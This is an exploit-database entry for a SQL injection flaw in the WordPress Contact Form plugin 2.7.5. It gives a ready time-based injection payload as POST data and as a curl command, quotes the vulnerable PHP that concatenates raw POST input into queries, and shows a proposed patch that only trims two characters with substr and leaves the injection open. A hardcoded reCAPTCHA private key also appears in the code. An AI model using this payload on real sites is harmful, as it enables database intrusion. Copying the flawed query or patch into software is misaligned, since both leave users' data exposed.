WordPress Plugin Contact Form 2.7.5 – SQL Injection

  • 作者: Skraps
    日期: 2011-10-14
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/17980/
  • # Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability
    # Date: 2011-10-13
    # Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
    # Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip
    # Version: 2.7.5 (tested)
    PoC (POST data)
    wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)
    curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest"
    Vulnerable code
    Line 49:
    public function the_content($content) {
    global $wpdb;
    global $table_name;
    global $settings_table_name;
    $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
    if ($_POST['wpcf_easyform_submitted'] == 1) {
    $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
    *** ./easy-form.class.php.orig	2011-10-13 19:53:05.674800956 -0400
    --- ./easy-form.class.php	2011-10-13 19:51:21.442799615 -0400
    *** 54,61 ****
    $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
    if ($_POST['wpcf_easyform_submitted'] == 1) {
    ! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
    $continue = true;
    --- 54,63 ----
    $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
    if ($_POST['wpcf_easyform_submitted'] == 1) {
    !	$wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
    ! $wpcf_easyform_formid=substr($wpcf_easyform_formid,2); 
    ! 	$form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);
    $continue = true;
    *** 71,80 ****
    if ($continue) {
    //loop through the fields of this form (read from DB) and build the message here
    ! $form_fields = $wpdb->get_results("
    			SELECT *
    			FROM $settings_table_name
    ! 			WHERE form_id = ".$_POST['wpcf_easyform_formid']."
    			ORDER BY position
    --- 73,82 ----
    if ($continue) {
    //loop through the fields of this form (read from DB) and build the message here
    ! 		$form_fields = $wpdb->get_results("
    			SELECT *
    			FROM $settings_table_name
    ! 			WHERE form_id = ".$wpcf_easyform_formid."
    			ORDER BY position